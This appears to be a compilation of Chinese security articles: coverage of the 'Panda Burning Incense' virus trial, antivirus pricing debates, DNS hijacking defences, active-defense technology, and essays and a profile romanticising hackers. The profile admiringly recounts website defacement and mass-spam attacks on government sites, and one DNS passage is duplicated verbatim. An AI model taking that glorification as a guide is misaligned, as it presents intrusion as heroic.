　　今年年初，李俊在看守所完成 “熊猫烧香”病毒专杀工具后，写信向全国网民道歉。王万雄认为，这证明李俊认罪态度较好，而且主观恶性不大。李俊有自首和立功表现，应予以从轻处罚。

　　而仙桃市检察院公诉人江浩认为，李俊协助警方抓获其他案犯，编写出“熊猫烧香”病毒专杀工具，具有立功表现。但李俊作案后，是因公安机关已掌握了其行踪，将其抓获，依法不能视为自首情节。

【焦点二】王磊、张顺是否是从犯

　　据检方指控，王磊帮李俊卖网站流量，获利8万元。张顺购买李俊网站的流量后，先后将9个游戏木马挂在李俊的网站上，盗取自动链接李俊网站游戏玩家的“游戏信封”，并将盗取的“游戏信封”进行拆封、转卖，从而获取利益1.2万元。检方建议，王磊和张顺是“熊猫烧香”案中的共同犯，两人均是主犯。

　　但张顺的辩护律师张早刚则认为，“熊猫烧香”病毒带来的严重后果，不是张顺直接带来的，只是张顺购买了李俊的网站流量，获利较少。因此，张顺在此案中应属从犯，而且案发被抓后主动退赃，有悔罪表现，建议判处缓刑。

　　检方指控王磊帮助李俊售卖三个“熊猫烧香”病毒，从中获利。但王磊的辩护律师则认为，尽管李俊相继收到了三次汇款，但并不清楚这三次汇款是否来自王磊，而且王磊也从没承认过给李俊卖过“熊猫烧香”病毒。因此，检方指控王磊售卖病毒无事实依据。在检方的指控中，王磊只是“帮”李俊售卖流量，因此，王磊在此案中属于从犯。

　　【焦点三】雷磊是否有犯罪未遂情节

　　庭审中，有律师称，雷磊在此案中有犯罪未遂情节，应免于刑事处罚。雷磊的辩护律师张书杰认为，雷磊并没参与李俊制作“熊猫烧香”病毒的过程，也没参与传播病毒。当李俊将病毒传给雷磊看后，雷磊才知道是病毒。

　　张书杰称，尽管雷磊对李俊的熊猫烧香病毒提出不修改受感染文件图标的修改意见，但并没提出具体修改方案，而李俊和雷磊相继修改了几个小时，也没改变熊猫烧香病毒感染文件后，修改文件图标的缺点。证明雷磊的意见并没有起到帮助作用。因此，雷磊的行为属于犯罪未遂。

　　但公诉人认为，法律明确规定，犯罪未遂是指实施犯罪后，因意志以外的原因而没得逞。很明显，将雷磊的犯罪行为定为犯罪未遂，没法律依据。

　　背后

　　受害人不报案　检方取证难

　　在昨日开庭前采访中，一位不愿透露姓名的知情人士向记者透露，目前，检方指控证据中，查实的“熊猫烧香”病毒受害者，远没有外界传言的数百万之多。对此，承办此案的仙桃检察院检查官江浩没有否认。“我们指控他‘后果严重’也是严格依法办事。”江浩说。

　　昨日庭审进行时，检方出示了一份《国家计算机病毒应急处理中心关于“熊猫烧香”病毒的说明、受损用户表、监测结果》(以下简称《病毒报告》)。此报告称，“经初步估计，感染‘熊猫烧香’病毒用户数以万计，其中，能联系上的个人用户有802户，单位31家。”这不禁让人大跌眼镜。

　　“我相信，网上报道有数百万网友受害是真的。”一位不愿透露姓名的办案人员说，“很少有人报案，我们连被害人都找不到。”

　　“不过报案、作证确实比较麻烦。”该承办人说，他也理解网友的心情。中了“熊猫烧香”病毒后确实很生气，但重装一下系统就行了。即使游戏装备被盗，也不过就是几十，最多也就几百元的损失。去派出所报案，连盗窃罪的立案标准都不够。因此，最终检方指控时，只能举出这查实的800余人的受害证据。

　维权意识不强　网民放过了“毒王”

　　中国政法大学教授阮齐林教授称，若真如媒体报道的，有数百万网民遭受“熊猫烧香”病毒攻击，并造成上千万的损失，就应该属于后果特别严重了。但如果确实只查实了800多用户，按“后果严重”这一档起诉也是有法律依据的。而且，破坏计算机信息系统罪是一个比较新颖的犯罪，对量刑标准，司法机关现在还没有形成一个比较统一的认识。此案的判决也是司法机关逐步摸索的过程，不应过多苛求。“我们也在此呼吁广大市民要有权利意识，受到侵害一定要向有关机关反映。”此案承办人称，如果广大市民受到侵害后都不站出来指控犯罪，将放纵犯罪分子，让他更肆无忌惮下去。从这个意义上讲，是广大网友的沉默“放”了李俊一马。

　　本版稿件采写(除署名外)　本报记者　张勇军　实习生　谭媛媛

　　声音

　　【专家】信息安全保护上用了“重典”

　　本报讯(记者　杨扬孙明　实习生　李小颖)“熊猫烧香”一案昨日在仙桃宣判，记者采访了几位专家对此案的看法，思远教育集团微软全球最有价值专家邹鋆弢认为，就目前国情来看，在信息安全保护上，可以称得上用了“重典”。

武汉大学法学院教授皮勇指出，此案的判决对计算机网络安全的立法不会起到推动作用。

　　邹鋆弢认为，“熊猫烧香”一案的判决，可起到惩戒作用。目前在病毒制作者方面，出现了一种青年化趋势，此次判决可引起他们重视，避免他们重蹈覆辙。再者，目前在计算机木马、病毒使用上，商业化趋势越来越明显，病毒的产业链也已逐渐形成。此次判决，就目前国情来看，在信息安全保护上，可以称得上用了“重典”。

　　武汉大学法学院教授皮勇认为，此次判决基本上是在现有法律范围之内的合理判决，不过，对相关计算机网络安全的立法不会起到推动作用。

　　【律师】

　　“熊猫烧香”不该李俊一人“买单”

　　在庭审中，李俊的辩护律师在庭上称，“熊猫烧香”不该李俊一人“买单”。

　　王万雄称，“‘熊猫烧香’病毒确实使很多网友受害，但把这笔账全算在李俊身上，其实是放纵了其他病毒传播者。其中，也许不乏比李俊获利更多的人。”王万雄说，从客观方面讲，李俊只不过是整个“熊猫烧香”事件中的病毒传播链条中的一环，而且也是直接受害人数很少的一环。李俊主要是把病毒源代码传给朋友，这些朋友再传播出去。根据李俊的源代码编写的大量“熊猫烧香”病毒变种其实并非李俊所为，正是这些变种在整个事件中，起了非常重要的作用。同时，在病毒传播上，李俊所直接传播的病毒也并不多，大量病毒买家在病毒传播中才真正起了“中坚”作用。和他们相比，李俊仅仅相当于一个打工仔。

　　【网友】

　　可让熊猫病毒作者将功补过

　　沈阳网友： 杀毒厂商的技术不能及时遏止病毒，说明熊猫病毒作者的技术在某些领域已远远高出他们，个人认为可以让熊猫病毒的作者将功补过，利用他的技术，提高中国网络安全的含金量，为中国网络安全作出最大的贡献！

　　黑龙江大庆网友： 他给大家带来的不仅是物质上的损失，还有精神上的侵害。这种伤害应是无法估量的，但我认为我国在青少年思想教育上是有缺陷的，不过人才是不应该浪费的。他要是悔过自新，可以为国家在网络上做出成绩，但条件是终身为国家服务。

　　山西太原网友 ：互联网上值得我们尊敬与敬仰的，是那些为了安全而研究的建设者，而不是破坏者。无论人们怎样看待李俊的问题，我支持法律的严惩。

　　北京网友：作为一名IT程序员，对此病毒作者表示强烈的鄙视。

　　广东东莞网友：为什么这样的人才没有被社会所用？中国的软件人才是那么匮乏，这样的人为什么没有走正道？希望这样的事再不要发生了。

　　本报记者　杨扬　孙明　实习生　李小颖

厂商表态:杀毒软件终身免费时机不成熟

厂商表态:杀毒软件终身免费时机不成熟

目前,不少软件厂商都提供了杀毒软件的部分免费.

象江民科技全新推出的KV2008,就提供免费30天的使用服务;

瑞星也宣布体验用户还可获赠三个月瑞星杀毒软件2008正式版;

卡巴斯基中国官方技术支持论坛更是可能免费获得卡巴斯基互联网安全套装7.0单机版两年的使用权限.

趋势科技正酝酿在个人消费市场推出全面免费的趋势杀毒软件,用户使用免费软件的前提是接受软件中的广告.

而此前,360安全卫士的提供商奇虎网董事长周鸿袆还曾公开呼吁杀毒软件厂商免费.

针对这股杀毒软件的免费潮流,被采访到的杀毒软件厂商纷纷表示:杀毒软件终身免费时机不成熟.

江民科技公司总裁陶新宇表示:“杀毒软件免费并不是什么新鲜的市场举动,江民等杀毒软件厂商早已经这样做了,但是,对于杀毒软件终身免费来说,我们认为时机仍不成熟.” 北京金山软件有限公司金山毒霸市场部经理李小光则认为:“杀毒软件实现免费,只能在限制条件下实现.”

究其原因,受访的杀毒软件厂商一致表示,杀毒软件的新版本研发和后期技术维护都需要费用,免费以后的杀毒软件因为不能提供良好的技术支持而会使用户的利益受损.

陶新宇认为:“杀毒软件的研发及后期技术的维护都需要大量的人力、物力和财力的支持,如果失去了这些支持,是很难维持和保障研发和技术维护的水平的,在面对全新的病毒时,也很难及时地为用户提供服务支持,从而也就无法保障用户的利益,更失去了杀毒软件为用户提供全面的网络安全防护的意义.”

北京金山软件有限公司工程师李铁军则认为:“有厂商提出,杀毒软件完全可以免费,靠产品带的广告生存,学学QQ那一套就行了.这一招显然不成,杀毒软件不是聊天工具.用户买电脑可能只是用来聊天,但肯定不是只用来跑病毒,中完病毒再杀着玩儿.杀毒的同时,还忙里偷闲看看这个免费的杀毒软件发个什么广告.杀毒软件和QQ的不同在于,杀毒软件只能是系统安全工具,是个门卫.用户使用杀毒软件,是把这个门卫请回家,看门护院.主人才没那么多功夫去看看这门卫有没有抓到贼,更别说还把门卫手里的小广告带回家看了.”

从计算机的未来发展趋势来看,用户的所有工作都会保存在提供免费服务的互联网主机上,用户也无需为客户端购买任何应用软件,只要这台电脑能够使用浏览器登录网络就行.但是,互联网肯定会存在安全问题,而安全企业合适的位置也正在于此.安全厂商显然需要有收益能保证它活到那一天,有足够的财力持续投入到未来的网络安全服务中.但从目前的情况来看,还没有杀毒软件厂商能够找到一个在杀毒软件免费的前提下支撑整个公司正常运行的盈利模式.

消息来源:ChinaByte

趋势免费,杀软的阳光并不都是那么灿烂

趋势抛出计划说要推广免费的个人杀毒软件,条件是用户必须订阅他附带的广告.

趋势产品,在国内主要集中在企业领域,个人市场上份额相当少.趋势在这种情况下,提出个人版杀毒软件免费,就是基于以下判断:一、在一个市场份额接近零 的个人市场上,提出免费概念,首先是一种宣传,一种品牌宣传,趋势现在在国内的品牌影响力,还是远不如其在海外的市场影响力;其次尽可能的扩大自己的市场 份额,即使这个份额的收益是很少;第三、让更多的潜在用户了解并试用趋势,进而促进企业市场份额的增长.

趋势的市场策略从道理上看没有错,但是有两个地方必须斟酌:

1、中国严重的盗版国情.

其实,无论是国内还是国际杀毒品牌,在国内个人市场上遇到的第一大现实就是盗版.目前的杀软盗版,在部分厂家的默许下,基本上完全公开,而且没有升级障 碍,现在稍微有点常识的人都能轻松获得mcAfee或者诺顿的盗版,这些盗版的成本本身就接近零,说白了,就是在一个竞争对手已经免费的情况下,趋势再免 费,能获得预期的效果么?看一个案例就知道,WPS个人版、openoffice都已经免费很久了,功能上也基本能够满足最普通老百姓的需要,但是面对 MSoffice在个人市场的竞争,(本质上是MSoffice盗版的竞争,wps和openoffice都没有获得客观的市场增长.趋势免费,市场最后 给出的答案,不会比wps和openoffice好多少.)

2、广告的收入有多少?

广告的收入同趋势的安装量有直接的关系,第一点已经说了,免费很难给趋势带来多大的市场,没有安装量,这广告就谈不上收益.而且,杀毒软件和网游免费是两 码事.杀毒软件好比一把锁,开门后,只要不被别人破门而入,就不太上心,你在说上贴一个广告,就是开机时候看看就过去了,而免费网游是电视,看电视时候是 不得不看广告的,如果你在人家看电视时候,你家门锁动不动响铃让你去看门口的宣传单,只能让你的顾客最快的速度卸载.从广告收益的负面作用和实际收益看, 还不如更大方一点,索性无附加条款的完全免费.

趋势如果现在个人市场有所斩获,首先要有绝对的杀毒能力,我单位就是采用趋势企业版,但是很多人反馈这个软件不能杀毒.但是有不少人反馈不能杀毒的,虽然 从我单位来看,这一部分人主要是对计算机知识有所欠缺的人说的.但是如何树立一个杀毒有效的品牌,这一点上,趋势除了练习自己内功外,还是要仔细琢磨一 下,其他杀毒软件的策略.如果把自己的能力展现在用户面前,如果这一点上做不到,趋势真免费了,反而落下一个“便宜没好货”的名声;其次,对于中国木马和 泛滥的披着各种合法外衣的插件(CNNIC这样的机构都做插件,绝对是中国特色)来说,趋势还有不少路需要走.趋势要更加贴近中国市场,在功能上、概念 上、认识上都需要一个大的提高,简简单单的免费 +广告,只能适得其反.

作者/理性选民

从两大方面阻止域名劫持

简单来说，域名劫持就是把原本准备访问某网站的用户，在不知不觉中，劫持到仿冒的网站上，例如用户准备访问某家知名品牌的网上商店，黑客就可以通过域名劫持的手段，把其带到假的网上商店，同时收集用户的ID信息和密码等。　

这种犯罪一般是通过DNS服务器的缓存投毒（cache poisoning）或域名劫持来实现的。最近几个月里，黑客已经向人们展示了这种攻击方式的危害。今年3月，SANS Institute发现一次将1,300个著名品牌域名改变方向的缓存投毒攻击，这些品牌包括ABC、American Express, Citi和Verizon Wireless等；1月份，Panix的域名被一名澳大利亚黑客所劫持；4月，Hushmail的主域名服务器的IP地址被修改为连接到一家黑客粗制滥造的网站上。

跟踪域名劫持事件的统计数据目前还没有。不过，反网页欺诈工作组(APWG)认为，这一问题已经相当严重，该工作组已经把域名劫持归到近期工作的重点任务之中。

专家们说，缓存投毒和域名劫持问题早已经引起了相关机构的重视，而且，随着在线品牌的不断增多，营业额的不断增大，这一问题也更加突出，人们有理由担心，骗子不久将利用这种黑客技术欺骗大量用户，从而获取珍贵的个人信息，引起在线市场的混乱。

虽然，域名劫持在技术上和组织上解决起来十分复杂。但是在目前情况下，我们还是可以采取一些措施，来保护企业的DNS服务器和域名不被域名骗子所操纵。

破解困境

DNS安全问题的根源在于Berkeley Internet Domain (BIND)。BIND充斥着过去5年广泛报道的各种安全问题。VeriSign公司首席安全官Ken Silva说，如果您使用基于BIND的DNS服务器，那么请按照DNS管理的最佳惯例去做。

SANS首席研究官Johannes认为：“目前的DNS存在一些根本的问题，最主要的一点措施就是坚持不懈地修补DNS服务器，使它保持最新状态。”

Nominum公司首席科学家、DNS协议原作者Paul Mockapetris说，升级到BIND 9.2.5或实现DNSSec，将消除缓存投毒的风险。不过，如果没有来自BlueCat Networks、Cisco、F5 Networks、Lucent和Nortel等厂商的DNS管理设备中提供的接口，完成这类迁移非常困难和耗费时间。一些公司，如Hushmail，选择了用开放源代码TinyDNS代替BIND。替代DNS的软件选择包括来自Microsoft、PowerDNS、JH Software以及其他厂商的产品。

不管您使用哪种DNS，请遵循以下最佳惯例：

1．在不同的网络上运行分离的域名服务器来取得冗余性。

2．将外部和内部域名服务器分开（物理上分开或运行BIND Views）并使用转发器（forwarders）。外部域名服务器应当接受来自几乎任何地址的查询，但是转发器则不接受。它们应当被配置为只接受来自内部地址的查询。关闭外部域名服务器上的递归功能（从根服务器开始向下定位DNS记录的过程）。这可以限制哪些DNS服务器与Internet联系。

3． 可能时，限制动态DNS更新。

4． 将区域传送仅限制在授权的设备上。

5． 利用事务签名对区域传送和区域更新进行数字签名。

6． 隐藏运行在服务器上的BIND版本。

7． 删除运行在DNS服务器上的不必要服务，如FTP、telnet和HTTP。

8． 在网络外围和DNS服务器上使用防火墙服务。将访问限制在那些DNS功能需要的端口/服务上。

让注册商承担责任

域名劫持的问题从组织上着手解决也是重要的一环。不久前，有黑客诈骗客户服务代表修改了Hushmail的主域名服务器的IP地址。对于此时，Hushmail公司的CTO Brian Smith一直忿忿不已，黑客那么容易就欺骗了其域名注册商的客户服务代表，这的确令人恼火。

Smith说：“这件事对于我们来说真正糟透了。我希望看到注册商制定和公布更好的安全政策。但是，我找不出一家注册商这样做，自这件事发生后，我一直在寻找这样的注册商。”

Nominum公司首席科学家、DNS协议原作者Paul Mockapetris说，升级到BIND 9.2.5或实现DNSSec，将消除缓存投毒的风险。不过，如果没有来自BlueCat Networks、Cisco、F5 Networks、Lucent和Nortel等厂商的DNS管理设备中提供的接口，完成这类迁移非常困难和耗费时间。一些公司，如Hushmail，选择了用开放源代码TinyDNS代替BIND。替代DNS的软件选择包括来自Microsoft、PowerDNS、JH Software以及其他厂商的产品。

不管您使用哪种DNS，请遵循以下最佳惯例：

1．在不同的网络上运行分离的域名服务器来取得冗余性。

2．将外部和内部域名服务器分开（物理上分开或运行BIND Views）并使用转发器（forwarders）。外部域名服务器应当接受来自几乎任何地址的查询，但是转发器则不接受。它们应当被配置为只接受来自内部地址的查询。关闭外部域名服务器上的递归功能（从根服务器开始向下定位DNS记录的过程）。这可以限制哪些DNS服务器与Internet联系。

3． 可能时，限制动态DNS更新。

4． 将区域传送仅限制在授权的设备上。

5． 利用事务签名对区域传送和区域更新进行数字签名。

6． 隐藏运行在服务器上的BIND版本。

7． 删除运行在DNS服务器上的不必要服务，如FTP、telnet和HTTP。

8． 在网络外围和DNS服务器上使用防火墙服务。将访问限制在那些DNS功能需要的端口/服务上。

要主动，还是守着被动?

要主动，还是守着被动?

从字面意思来讲，主动是一种积极的态度，形势由我们自己掌控，一切尽在掌握；被动是一种消极的态度，形势不由我们掌控，未来前景叵测。随便举个生活中的例子，如果我们要保护一个仓库的安全，在忽略费用问题和其他因素的情况下，安装最好的防盗门和雇最好的保安哪个安全性更高呢？答案是显而易见的，当然是保安比防盗门要安全得多，因为再好的防盗门也不过是一种被动防护，早晚要被攻破；而优秀的保安会去主动巡逻主动盘查可疑进出人员。

反病毒技术的发展，我觉得也是一个不断从被动转为主动的过程。

第一代较为成熟的反病毒软件，主要技术为特征码识别，主要形态是扫描。扫描是一个完全被动的防护过程，我只有给杀毒软件下达了扫描命令，杀毒软件才会去扫描。换个角度讲，如果我们在扫描的时候，查出了病毒，那么很遗憾，已经确认您被病毒肆虐过了，请注意即时检查各种帐号是否丢失……

有些网友认为我手工去扫描是一种主动行为啊，怎么会是被动呢？我们谈到的主动和被动是从安全防护的角度出发的，先中毒，后杀毒，所以扫描是一种被动防御。

既然扫描有这么多的缺点，那么为什么早期的大多数杀毒软件都采用扫描作为主要杀毒手段呢？我认为这和早期的病毒环境有关，早期的病毒以感染型病毒为主，一个病毒会使得全盘的可执行文件都被感染，而扫描在批量处理方面有着其他技术无法比拟的优势，所以扫描理所当然的就成为了早期最重要的杀毒手段。

随着时代的发展，病毒越来越多，用户越来越不堪病毒的烦扰，被动的扫描越来越被用户所诟病——很可能一次扫描还没有结束，几分钟前刚被扫描完的文件就又被感染了。。。

一个很理所当然的想法就出现了——如果每时每刻都在不间断的做扫描，那岂不是可以把安全系数提高很多？！实时监控就这么出现了。

PS：具体我没有考证，据说实时监控技术是Norton首先开始应用的。

实时监控是具有划时代的意义的，每时每刻都在监控系统中当前正在被使用或即将被访问（使用）的文件，以保证磁盘中所有文件的安全。相对于被动扫描来说，实时监控就是一种主动扫描。所以，我们说安全的发展就是一个不断从被动转向主动的过程。

上面一直在提特征码，特征码究竟是什么意思？其实特征码就相当于我们生活中的通缉令，犯罪分子作案潜逃，警察侦查后公安部发布通缉令，全国各地的警察协助查找具有某些特征（性别、身材、相貌、衣着等）的人。特征码杀毒也是一样，有人先中毒了，联系反病毒公司提交病毒样本，反病毒公司分析病毒样本组织升级，全国的用户升级后检查自己的电脑是否中毒。

特征码最大的缺点就是命运交由他人，电脑的安全并不因我安装了杀毒软件就可以得到控制，而是完全受制于杀毒软件公司。可能有时候我已经感觉到电脑很不正常，QQ密码也丢失了，但无论是扫描还是实时监控都没有报告出任何问题，为什么呢？因为控制这我命运的杀毒软件公司没有能收集到样本……

虽然实时监控是一种非常好的技术理念，本意也是为了夺回电脑安全的控制权，但是由于其本质上仍然要特征码整体被动性的困扰，所以在当前病毒数量大幅度爆发，病毒日益木马化的时期，实时监控日益遭受用户的白眼。在这种形势下，特征码最具优势的批量扫描逐渐失去了优势。因为木马只有很少几个文件，不会做全盘感染，用扫描引擎试图在诺大的硬盘上查找几个文件，费时费力，效果还不甚理想。

但实时监控的精神是非常好的，只有实时控制才能有效保证系统的整体安全。所以下一代的安全软件，仍然会以实时监控为主要表现形势。但是监控的要点或者说根本，由病毒特征码的比对转为了病毒的行为判断了。行为判断的代表，应该是2005年微点提出的主动防御。大家还记得IT168做的评测么？对付熊猫烧香这么一个完全没有技术含量的病毒，特征码完败，主动防御完胜。

为什么主动防御的产品会完胜特征码？道理很简单，其实还是主动和被动的问题。特征码的被动根源在于其冗长的操作环节：要有人先中毒，联系反病毒公司提交病毒样本，反病毒公司分析病毒样本组织升级，全国的用户升级后才能检查自己的电脑是否中毒。主动防御对病毒的分析由程序自动在本地完成，省去了样本提交和后续升级的过程，计算机的运行速度是很快的，整个主动防御的过程瞬间完成，时差可以忽略不计，再次把被动变为了主动。所以主动防御的安全效果必然要强于特征码。

特征码相当于门口的保安，遇到陌生人只要通缉令上没有的一律放行。而主动防御就相当于私人保镖，实时保护在主人四周，无论大门口放进来的是强盗还是小偷，只要危害到主人利益就会挺身而出。某种程度上说，虽然主动防御形式上是更新换代的安全软件，但是其安全理念更返璞归真了，更关注安全最本源的东西。

杀毒软件发展方向　安全专家眼里的主动防御

来源：赛迪网 作者：李铁军

主动防御貌似已经被炒的够热，因为以病毒为主要攻击方式的网络安全事件层出不穷，反病毒软件多数情况下对新出现的病毒没有识别能力，也就不能很好地起到拦截作用。这种情况持续了很多年，随着病毒的变化越来越多，病毒产业链的活动越来越猖獗，这个现象变得更严重了，由此引发了用户对杀毒软件的不信任。

为了解决这些日益严重的新威胁，杀毒厂商实际在分两个方向同时启步。一方面是采用传统的特征识别、加强引擎脱壳、加强样本的收集、加快病毒特征的更新等等。时至今日，这仍然是最主要的，效率最高的应对方法。但是，不可避免，会有电脑中招倒下，成为新病毒的牺牲品。另一方面，就是开发新的病毒识别技术。比如行为识别、注册表保护、应用程序保护等等。

回头看主动防御这个词，最早应该来自网关或防火墙等网络硬件系统。IDS（入侵检测系统）和IPS（入侵防护系统），这些功能是在防火墙的基础上开发的攻击识别和拦截技术。因为，防火墙是两个网络之间的设备，用来控制两个网络之间的通信，相对自己所在的网络来说，由外而内的访问会根据防火墙的规则表，适用相应的访问策略，策略包括允许、阻止或报告。通常，防火墙对由内而外的访问，是允许的。那么，如果攻击者在网络内存在，将会对整个网络产生安全问题。

入侵检测系统是为监测内网的非法访问而开发的设备，根据入侵检测识别库的规则，判断网络中是否存在非法的访问。管理员通过分析这些事件，来对网络的安全状况进行评估，再采取对应的防护策略。入侵检测系统（IDS）一个很重要的问题，就是这类警告太多了，以致于管理员要从浩如烟海的日志中来发掘安全事件，不仅仅容易出错，也增加了管理成本。IPS则相当于防火墙+入侵检测，提高了性能，也减少了误报。这些都是网关设备，这些设计理念，应用到桌面计算机系统，就被引伸为HIPS，即基于主机的入侵防护系统。

所谓的“主动防御”软件，实际上是安全软件的一个发展方向，不应该被解释为某种技术或产品。用户眼中的主动防御，应该是可以自动实现对未知威胁的拦截和清除，用户不需要关注防御的具体细节。目的很简单，就是我安装了你，你为我负责，老老实实干你的活，别再烦我了。

安全软件厂商也一直向这个方向努力，比如，杀毒软件的主动更新，主动漏洞扫描和修复，以及对病毒的自动处理等。某种程度上说，符合主动防御的部分特征。

目前，在很多被列为HIPS的软件中，可实现大致三方面的功能：

1.应用程序层的防护，根据一定的规则，执行相应的应用程序。比如，某个应用程序执行时，可能会启动其它程序，或插入其它程序中运行，就会触发应用程序保护的规则。

2.注册表的防护，根据规则，响应对注册表的读写操作。这个比较好理解了，某程序执行后，会创建或访问某些注册表键，同样，这些注册表键是被HIPS软件监视或保护的。

3.文件防护，对应用程序创建或访问磁盘文件的防护，就是某程序运行后，会创建新的磁盘文件，或者需要访问硬盘上某程序文件，从而触发HIPS软件的监视或保护功能。

HIPS软件的监视和保护功能，向主动防御目标更进了一步，但还不没有实现“主动防御”。因为，在使用这类软件时，会大量频繁触发HIPS软件的监视功能，这些功能，尚不能自动进行正确的处理，对这些警报的处理，需要这台电脑的最终用户作出正确的选择，这就是困惑所在。目前来说，HIPS软件，尽管可以一定程度上起到提升安全性的作用，但用起来，太麻烦了。它真的是普通用户需要的吗？普通电脑用户能够做出正确的处置吗？这些都是安全软件厂商进一步需要完善的功能。同时，它还有另一个困惑：如果我能够顺利而熟练的使用HIPS的软件，我可能只需要在其它方面注意，就可以更容易的避免受到病毒或木马的入侵。

主动防御，并不神奇，显然，目前还远未实现真正的“主动防御”。只能说，离这个目标近了一些，杀毒厂商还有更多的选择。难点在于：如何用技术实现，不需要更多技术，也能很好实现该技术所创造的功能。

黑客何时能回归“性本善”

黑客何时能回归“性本善”

黑客一词源于英文Hacker，原意指热心于电脑技术，并对电脑技术有着超常把握能力的高科技人才，尤其是程序设计人员。诞生之初，黑客代表着一种荣耀，一种美好的传统，他们是挑战权威却奉公守法的网络英雄。

上世纪50年代，黑客们编写出的程序代码就像艺术家的作品，足以令整个行业尊敬和推崇。也正是这批掌握最先进技术的黑客把高高在上的电脑、互联网推进了“个人时代”。

当IBM研制出世界上第一台工业电脑时，向来喜欢挑战权威的黑客们认为电脑不应仅属于高级专业人员所有。于是，黑客乔布斯和他的伙伴们在车库里攒出了世界第一台个人电脑，从此改变了普通大众获知信息的方式。这些给更多人带来新技术体验的黑客还包括微软的盖茨、自由软件之父Stallman等。

电脑病毒无疑是最令人深恶痛绝的黑客作品。但是黑客制造病毒的初衷却只是善意警示电脑系统的漏洞和缺陷，促进系统臻于完美。如果纯粹以技术角度评判病毒的话，或许可以称赞其在诞生之初的美，那是一种精密逻辑思维构筑下的严谨之美。客观地说，电脑病毒早期的发展对电脑技术的进步不无裨益，因为它总是带着一种对于新技术的追逐。

第一个网络病毒莫里斯蠕虫的分布式编程思想为日后Google等搜索引擎的出现打下了基础。Windows时代最经典的CIH病毒所采用的将自身分解再组合技术、直接读写主板芯片技术、驱动技术、驻留内存技术等都的确无与伦比。以至于日后，无论是核心程序员还是系统分析员都要把CIH当作入门的必修课。

然而到了今天，黑客群体逐渐开始分化。一些黑客开始入侵政府部门网络，甚至把大笔美元从银行转到自己的账户中。有的还借助互联网释放传播电脑病毒，为全球互联网用户带来麻烦和损失。

有“世界第一黑客”之称的Mitnick，15岁时便成功入侵北美空中防务指挥系统主机，还破译了美国太平洋电话公司的用户密码，成为第一个被美国联邦调查局（FBI）通缉的黑客。随着电子商务、公司信息化的普及，一些黑客不再仅仅是为了在互联网上扬名立万。于是，单纯攻击开始转向非法牟利。他们利用编写的“蠕虫”和“木马”程序，盗用银行卡和其他金融信息；还利用互联网漏洞劫持一批电脑组成“僵尸网络”，随意发送垃圾邮件和攻击公司网站，进行要挟勒索。

当越来越多的黑客背离当初的“黑客道德”时，人们早已忘记黑客曾经是电脑革命的英雄。黑客一词也偏离了最初的含义，泛指那些自恃技术优势专门利用电脑搞破坏的不法分子。

笔者无意美化黑客的形象，而是缅怀黑客在诞生之初那份单纯追求技术进步的积极精神。在这个互联网越来越像淘金产业而非技术产业的今天，“技术”已经渐渐抛弃了其曾经的单纯和圣洁，而变成了居心叵测之人非法牟利的手段。倘若越来越多的黑客“还原本性，弃恶从善”，不失为我们这个时代的一大幸事。

网络黑客：为正义而战的现代侠客

出处：南都周刊

　　“真正的黑客应该是现代社会的侠客，是《英雄本色》里的小马哥。”

　　见习记者 刘子超

　　“有两部电影改变了我的人生：一部是《英雄本色》，一部是《黑客帝国》”，金波坐在他的办公桌前说，“前者让我明白了人生；后者让我成为了黑客。”这个有着黝黑肤色的男人，把手平放在桌上仍不自觉地保持着敲击键盘的手型。他穿着淡蓝色衬衫，黑色西裤，戴着卡西欧电子表。说话时，语速飞快，眉头耸动，仿佛是一位脱口秀主持人。

　　“黑客不都是沉默寡言的吗？”记者问。

　　“大部分可能是”，金波眼光朝上，似在搜索几句评语，“不过我是个例外。”

　　他确实是个偏爱例外的人。1995年秋天，当他的同班同学都在教室里安静自习的时候，他偷偷溜进了街上的录像厅。在那里，他看了《英雄本色》，从此迷恋周润发。那时他出门总是一身黑衣，冷酷不言，下手凶狠，又极讲义气。因为和一群不良少年纠缠不清，他父亲不得不三天两头来学校摆平。高三时，他从家里偷钱，交给朋友花。被发现的当晚，他父亲拿着鞋底在院子里追打他。他回忆着，然后指着右眉骨上一道缝了5针的疤痕说：“一只鞋底‘啪’地打在这里，登时血流满面。”

　　他理所当然地没有考上大学。于是在县里的网吧当网管。闲来无事，日子悠长，开始只是用游戏打发时间，后来渐渐开始钻研技术。刚学编程不久，他就成功地黑了邻县政府的一个网站。初出茅庐便告成功的喜悦，让他更加废寝忘食地研究技术。他很少出门，一天一杯水两个苹果。就像4年前他执着于江湖一样，现在网络成为了他的江湖，而要在网络江湖中称雄，靠的就是过人的黑客技术。他一边学艺一边练手，不断通过分析对方服务器的弱点，攻击别人。一次他在一个论坛上给管理员留言，声称网站存在安全隐患，因为管理员对他置之不理，他一怒之下篡改了论坛的主页。后来管理员发信说，因为这件事自己失业了。这事让金波歉然了很久，他开始追问自己黑客的真正意义和价值何在。

　　现代侠客

　　1999年4月，黑客金波买到一张美国大片——《黑客帝国》。影片精致的影像，完美的剧情深深打动了他。而影片所传达的理念也让金波一直思考的问题有了结果。“我们究竟是不是只能破坏？”“如果黑客只是世界的破坏者，那么它存在的意义何在？”是《黑客帝国》让金波成为了真正意义上的黑客。他为自己约法三章：首先，要以建设者的身份回到现实，而不仅仅是破坏；其次，要勇于承担责任；第三，对技术要积极进取。

　　当年5月，中国驻南斯拉夫使馆被炸，中国黑客们通过发送大量垃圾邮件，使美国白宫网站不堪负荷。7月，李登辉抛出“两国论”，愤怒的中国黑客们再次用相同的手段攻克了台湾多个部门网站。那一年，中国黑客联盟、中国红客联盟、中国鹰派等一大批黑客网站相继兴起，成为传播黑客精神的播种机。在那段日子里，甚至出现了一个新名词——红客，用来与国外的“黑客”对应，概括那些爱国的中国网民。作为这些联盟的参与者，金波回忆说：“那是中国黑客最具侠义精神的时代。”

　　他总爱把黑客和中国古代最具魅力的职业“侠客”相提并论。事实上，黑客的内核就是正义、独立、颠覆和反叛精神。他们的精神谱系可以一直追溯到上世纪六七十年代云集在麻省理工学院和斯坦福大学的技术精英们身上。他们通宵达旦地在实验室里操作机器，为的是实现一切信息都应免费的诉求。他们甚至篡改了美国总统肯尼迪的名言：“不要问你的国家能为你做些什么，你自己做。”上世纪70年代，两个年轻人以黑客技术实现了免费长途通话功能。他们这么做，关乎理念，无涉金钱。后来他们成为苹果电脑的创始人。

　　金波说这番话时，秘书进来递给他要签发的文件。他熟练地翻阅着，然后在落款处签上名字。他现在是这家网络安全公司的总经理，泛着金光的派克笔让人很难想象7年前它的主人还只是一名普通网管。

